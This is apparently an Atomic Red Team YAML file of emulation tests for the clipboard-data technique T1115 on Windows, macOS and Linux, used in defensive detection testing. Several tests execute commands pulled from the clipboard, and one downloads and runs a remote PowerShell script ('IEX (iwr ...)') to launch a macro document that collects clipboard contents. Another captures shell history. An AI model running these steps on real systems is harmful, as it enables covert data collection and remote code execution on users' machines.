Josh Rickard
a5dd0813cd
* fix: Updating atomics YAML file structure to align with the new JSON schema definition. This also fixes some white space issues and general line formatting across all impacted atomics. * fix: One additional change needed --------- Co-authored-by: MSAdministrator <MSAdministrator@users.noreply.github.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
84 lines
3.0 KiB
YAML
84 lines
3.0 KiB
YAML
attack_technique: T1115
|
|
display_name: Clipboard Data
|
|
atomic_tests:
|
|
- name: Utilize Clipboard to store or execute commands from
|
|
auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
|
|
description: |
|
|
Add data to clipboard to copy off or execute commands from.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
dir | clip
|
|
echo "T1115" > %temp%\T1115.txt
|
|
clip < %temp%\T1115.txt
|
|
cleanup_command: |
|
|
del %temp%\T1115.txt >nul 2>&1
|
|
name: command_prompt
|
|
- name: Execute Commands from Clipboard using PowerShell
|
|
auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
|
|
description: |
|
|
Utilize PowerShell to echo a command to clipboard and execute it
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
echo Get-Process | clip
|
|
Get-Clipboard | iex
|
|
name: powershell
|
|
- name: Execute commands from clipboard
|
|
auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
|
|
description: Echo a command to clipboard and execute it
|
|
supported_platforms:
|
|
- macos
|
|
executor:
|
|
command: |-
|
|
echo ifconfig | pbcopy
|
|
$(pbpaste)
|
|
name: bash
|
|
- name: Collect Clipboard Data via VBA
|
|
auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
|
|
description: |
|
|
This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
ms_product:
|
|
description: Maldoc application Word
|
|
type: string
|
|
default: Word
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Microsoft #{ms_product} must be installed
|
|
prereq_command: |
|
|
try {
|
|
New-Object -COMObject "#{ms_product}.Application" | Out-Null
|
|
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
|
|
Stop-Process -Name $process
|
|
exit 0
|
|
} catch { exit 1 }
|
|
get_prereq_command: |
|
|
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
|
|
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
|
|
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
|
|
cleanup_command: |
|
|
Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
|
|
name: powershell
|
|
- name: Add or copy content to clipboard with xClip
|
|
auto_generated_guid: ee363e53-b083-4230-aff3-f8d955f2d5bb
|
|
description: |
|
|
Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
command: |
|
|
apt install xclip -y
|
|
history | tail -n 30 | xclip -sel clip
|
|
xclip -o > history.txt
|
|
name: sh
|